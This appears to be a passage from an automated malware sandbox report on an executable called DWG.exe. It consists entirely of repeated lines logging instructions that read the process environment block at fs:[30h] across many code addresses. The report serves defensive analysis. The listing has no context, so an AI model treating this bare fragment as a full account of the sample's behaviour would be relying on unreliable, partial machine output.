Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0045DB28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0045DDF8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A79080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A758EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B44015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B44015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B32073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B41074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A90050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A90050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A999BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B041E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A94120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A94120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A79100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A79100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A79100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A752A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B34AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A88A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A93A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A75210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A75210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A75210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A75210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AB927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B2B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B2B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B48A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A79240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B04257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B45BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A81B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A81B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B2D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B223E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B223E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B223E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B3131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B48B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A7F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B314FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B48CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AABC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B4740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B4740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B4740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B0C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AAA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A72D8A mov eax, dword ptr fs:[00000030h]
